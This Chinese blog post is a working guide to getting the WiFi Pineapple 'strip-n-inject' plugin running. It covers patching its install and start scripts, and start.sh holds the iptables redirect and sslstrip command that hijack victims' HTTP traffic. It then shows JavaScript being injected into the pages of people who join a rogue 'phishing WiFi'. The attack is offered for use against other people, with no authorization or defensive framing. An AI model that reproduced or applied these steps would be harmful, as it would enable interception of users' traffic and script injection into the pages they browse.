WIFI菠萝 strip-n-inject插件安装与使用
WIFI菠萝有一个strip-n-inject插件。可以在其他人连上钓鱼WIFI浏览网页时,在其网页源码末尾插入文字。当然包括HTML标签和Javascript代码。所以可以做到XSS攻击。
而一开始将strip-n-inject插件放到/pineapple/components/infusions/目录,打开Web页面,点Install按钮,一般是安装不成功的。
于是看了一下它的安装脚本:
/pineapple/components/infusions/strip-n-inject/includes/install.sh
#!/bin/shinstalled="0"# install deps
opkg remove twisted-web --force-depends && opkg update && opkg install twisted-web && installed="1"if [ ! -e "/usr/lib/python2.7/site-packages/OpenSSL" ]; thenln -s /sd/usr/lib/python2.7/site-packages/OpenSSL /usr/lib/python2.7/site-packages/
fiif [ ! -e "/usr/lib/python2.7/site-packages/twisted/web" ]; thenln -s /sd/usr/lib/python2.7/site-packages/twisted/web /usr/lib/python2.7/site-packages/twisted/
fiif [ "${installed}" == "1" ]; thentouch installed
fi
从第六行可以看出,安装时卸载了twisted-web,然后又安装了一遍twisted-web。“twisted-web”是Python的一个Web应用开发框架。而WIFI菠萝也确实存在twisted-web。所以可以直接创建”installed“文件表示已安装。
# touch /pineapple/components/infusions/strip-n-inject/includes/installed
刷新网页后就显示安装好了。
不过只是点Start还是显示”Strip-N-Inject is not running...“。
原因很简单,插件运行时执行了/pineapple/components/infusions/strip-n-inject/includes/proxy/sslstrip.py脚本,并带上”/sd/tmp/proxy_inject.log“参数。显然,”/sd/tmp/“目录并不存在。
所以,我们可以创建这个目录:
# mkdir /sd/tmp
或者我们改动插件,指向”/tmp/“目录。
涉及到保存目录的文件有两个:include/data.php、include/start.sh。
include/data.php
<?phprequire("/pineapple/components/infusions/strip-n-inject/handler.php");global $directory, $rel_dir;require($directory."includes/vars.php");if (isset($_GET['proxylog']))
{if ($is_codeinject_running){// get some info$log_cmd = "touch /sd/tmp/proxy_inject.log ; tail -n 50 /sd/tmp/proxy_inject.log";exec ($log_cmd, $output1);foreach($output1 as $outputline1) { echo ("$outputline1\n"); }}else{echo "Strip-N-Inject is not running...";}
}
?>
只要更改14行,去掉两个”/sd“。
include/start.sh
#!/bin/bash# setup vars
export PATH=$PATH:/sd/usr/bin:/sd/usr/sbin
attacker_ip="$(cat proxy/attacker_ip.txt)"# set our iptables redirect
iptables -t nat -A PREROUTING ! -s "${attacker_ip}" -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
#iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000# start sslstrip/inject proxy
cd proxy
python sslstrip.py -s -k -f -w /sd/tmp/proxy_inject.log 2>&1 | at now &exit 0
同样更改倒数第三行就可以了。
然后我们Start一下。
成功了。
然后就可以开始使用了。
点”Injection Code“,然后可以在文本框中输入要注入的内容。比如JavaScript代码:
<script>alert("哈哈哈。")</script>
很简单,就是弹出写有”哈哈哈。“的对话框。
注意”Attacker IP“填好自己IP地址。当然,如果你在WIFI菠萝的父网段中也可以不设置。然后点Start
当其他人连上钓鱼WIFI并访问HTTP网页时(HTTPS没有):
当然也可以注入HTML标签:
当然远不止这样,你可以注入更牛逼的JS脚本。
如有谬误,望加指正。
转载注明出处:http://blog.csdn.net/qq_15983713/article/details/50242309
WIFI菠萝 strip-n-inject插件安装与使用相关推荐
- ElasticSearch及插件安装
序言:Lucene和Solr和Elasticsearch的区别 Lucene Lucene是apache下的一个子项目,是一个开放源代码的全文检索引擎工具包,但它不是一个完整的全文检索引擎,而是一个全 ...
- vue-devTools插件安装流程
vue-devTools插件安装流程 本文主要介绍 vue的调试工具 vue-devtools 的安装和使用 工欲善其事, 必先利其器, 快快一起来用vue-devtools来调试开发你的vue项目吧 ...
- Android Eclipse之Git插件安装、配置、提交、修改、冲突、查看历史、覆盖。
为什么80%的码农都做不了架构师?>>> 首先进入eclipse插件安装功能页面,这个就不多说了,下面给出截图,如果不会的也不必往下看了. 安装Git 一:Eclipse工具栏 ...
- MyEclipse插件安装
一.安装方法: 方法一.如果可以上网可在线安装 1. 打开Myeclipse,在菜单栏中选择Help→Software Updates→Find and Install; 2. 选择Search fo ...
- crx header invalid_解决Chrome插件安装时程序包无效【CRX_HEADER_INVALID】(转载+xPath插件)...
最近安排让协助开发/维护爬虫工具类,主要涉及到网页内容的获取,主要使用python+xPath作为解析库,初次认识,感觉还不错! https://www.w3.org/TR/xpath/all/ ht ...
- jupyter notebook快捷键总结及重要插件安装
1.命令模式 (press Esc to enable) F: find and replace Ctrl-Shift-P: open the command palette Enter: enter ...
- google浏览器插件安装时出错,Package is invalid: CRX HEADER INVALID
google浏览器插件安装时出错,Package is invalid: CRX HEADER INVALID 原文件 将.crx结尾的扩展文件改为rar或zip结尾,变成压缩文件 然后解压这个文件 ...
- Sublime Text 3便携版下载安装和常用插件安装--顺便解决报错An error occured installing和no packages available for install
文章目录 Sublime Text 3便携版下载安装和常用插件安装 1.Sublime Text 3便携版下载: 2.sublime 插件控制器(Package Control)安装 2.1离线安装P ...
- 134安装教程_PS教程连载第135课:PS第三方插件安装方法
点击图片 1元抢购 PS.PR.AE等课程活动 PS教程连载第135课 PS第三方插件安装方法 格式:mp4视频 素材领取:请查看文章底部 现在有许多外挂滤镜开发商将滤镜的安装程序设计的非常人性化 ...
最新文章
- Hadoop运行模式 之 本地运行模式
- pandas使用read_csv函数读取文件最后N行数据并保留表头、pandas使用read_csv函数读取网络url链接数据
- 如何日赚100万美金?(附“标准”答案)
- requirednew基于xml配置日志不回滚_Mybatis 系列 4:引入日志框架
- mysql新增用户和删除用户
- Python基础总结之常用内置方法总结
- 【流媒體】Android 实时视频采集—Camera预览采集
- C51 动态数码管 个人笔记
- 马斯洛提出动机理论_马斯洛的需要层次理论
- [转载]坐标系统与投影变换_-刘艳红-_新浪博客
- 为什么巡检在工业生产中如此重要?
- 玖富曲线入股湖北消金,已成第二大股东
- 中国计算机网络设备制造业总体趋势免费版,致自己的心灵鸡汤说说,句句经典,引人深思!...
- EasyUi 手机号码,邮箱,remote验证
- android 应用置顶到最前端_Android 将后台应用切换到前台
- idel使用工具快捷键
- 算法:使用单词表拼接字符串的方法数
- 【记录】数据处理方法总结及实现
- 浅析移动旺旺特服号之无限扩展
- 什么是GMS、CDMA、GPRS、EDGE、WCDMA